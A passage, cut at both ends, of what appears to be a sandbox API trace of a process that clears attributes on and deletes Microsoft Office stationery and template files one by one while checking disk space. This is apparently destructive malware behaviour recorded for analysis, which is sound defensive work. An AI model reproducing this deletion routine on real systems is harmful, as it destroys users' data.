lpFilePart=0x0) returned 0x13 [0082.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.HTM", dwFileAttributes=0x80) returned 1 [0082.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.htm")) returned 1 [0082.019] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.HTM", dwFileAttributes=0x80) returned 1 [0082.024] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\dadshirt.htm")) returned 1 [0082.027] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.HTM", dwFileAttributes=0x80) returned 1 [0082.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\judgesch.htm")) returned 1 [0082.037] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.HTM", dwFileAttributes=0x80) returned 1 [0082.040] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\jungle.htm")) returned 1 [0082.043] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.HTM", dwFileAttributes=0x80) returned 1 [0082.047] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.htm")) returned 1 [0082.049] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.JPG", dwFileAttributes=0x80) returned 1 [0082.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.jpg")) returned 1 [0082.057] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.HTM", dwFileAttributes=0x80) returned 1 [0082.062] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\offisupp.htm")) returned 1 [0082.065] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.HTM", dwFileAttributes=0x80) returned 1 [0082.070] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PAWPRINT.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pawprint.htm")) returned 1 [0082.073] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.HTM", dwFileAttributes=0x80) returned 1 [0082.077] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.htm")) returned 1 [0082.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.JPG", dwFileAttributes=0x80) returned 1 [0082.085] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\PINELUMB.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\pinelumb.jpg")) returned 1 [0082.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.HTM", dwFileAttributes=0x80) returned 1 [0082.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.htm")) returned 1 [0082.096] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.JPG", dwFileAttributes=0x80) returned 1 [0082.101] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.jpg")) returned 1 [0082.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.HTM", dwFileAttributes=0x80) returned 1 [0082.109] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\techtool.htm")) returned 1 [0082.111] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0082.111] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.111] CoTaskMemFree (pv=0x506980) [0082.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0082.112] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0082.112] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0082.112] CoTaskMemFree (pv=0x506980) [0082.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0082.224] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx", dwFileAttributes=0x80) returned 1 [0082.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyletter.dotx")) returned 1 [0082.278] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyMergeLetter.dotx", dwFileAttributes=0x80) returned 1 [0082.306] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencymergeletter.dotx")) returned 1 [0082.311] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyReport.dotx", dwFileAttributes=0x80) returned 1 [0082.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyReport.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyreport.dotx")) returned 1 [0082.761] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyResume.dotx", dwFileAttributes=0x80) returned 1 [0082.784] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyresume.dotx")) returned 1 [0082.789] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR1.XLT", dwFileAttributes=0x80) returned 1 [0082.796] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR1.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr1.xlt")) returned 1 [0082.800] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.806] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR10.XLT", dwFileAttributes=0x80) returned 1 [0082.806] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR10.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr10.xlt")) returned 1 [0082.809] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR2.XLT", dwFileAttributes=0x80) returned 1 [0082.815] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR2.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr2.xlt")) returned 1 [0082.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR3.XLT", dwFileAttributes=0x80) returned 1 [0082.826] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR3.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr3.xlt")) returned 1 [0082.828] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR4.XLT", dwFileAttributes=0x80) returned 1 [0082.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR4.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr4.xlt")) returned 1 [0082.840] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR5.XLT", dwFileAttributes=0x80) returned 1 [0082.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR5.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr5.xlt")) returned 1 [0082.849] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR6.XLT", dwFileAttributes=0x80) returned 1 [0082.890] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR6.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr6.xlt")) returned 1 [0082.893] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR7.XLT", dwFileAttributes=0x80) returned 1 [0082.900] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR7.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr7.xlt")) returned 1 [0082.903] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR8.XLT", dwFileAttributes=0x80) returned 1 [0082.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR8.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr8.xlt")) returned 1 [0082.912] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR9.XLT", dwFileAttributes=0x80) returned 1 [0082.920] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ADR9.XLT" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adr9.xlt")) returned 1 [0082.922] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryLetter.dotx", dwFileAttributes=0x80) returned 1 [0082.939] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecaryletter.dotx")) returned 1 [0082.942] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryMergeLetter.dotx", dwFileAttributes=0x80) returned 1 [0082.961] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecarymergeletter.dotx")) returned 1 [0082.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0082.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryNewsletter.dotx", dwFileAttributes=0x80) returned 1 [0082.993] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryNewsletter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecarynewsletter.dotx")) returned 1 [0082.997] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0083.022] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryResume.dotx", dwFileAttributes=0x80) returned 1 [0083.022] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ApothecaryResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\apothecaryresume.dotx")) returned 1 [0083.026] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0083.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BillingStatement.xltx", dwFileAttributes=0x80) returned 1 [0083.038] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BillingStatement.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\billingstatement.xltx")) returned 1 [0083.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0083.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieLetter.dotx", dwFileAttributes=0x80) returned 1 [0083.830] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktieletter.dotx")) returned 1 [0083.840] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0085.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieMergeLetter.dotx", dwFileAttributes=0x80) returned 1 [0085.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieMergeLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktiemergeletter.dotx")) returned 1 [0085.136] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0086.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieNewsletter.dotx", dwFileAttributes=0x80) returned 1 [0086.517] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieNewsletter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktienewsletter.dotx")) returned 1 [0086.525] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0087.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieResume.dotx", dwFileAttributes=0x80) returned 1 [0087.962] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BlackTieResume.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blacktieresume.dotx")) returned 1 [0087.969] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0087.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Blog.dotx", dwFileAttributes=0x80) returned 1 [0087.975] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Blog.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\blog.dotx")) returned 1 [0087.978] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0087.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BloodPressureTracker.xltx", dwFileAttributes=0x80) returned 1 [0087.984] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\BloodPressureTracker.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\bloodpressuretracker.xltx")) returned 1 [0087.988] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0088.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ClassicPhotoAlbum.potx", dwFileAttributes=0x80) returned 1 [0088.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 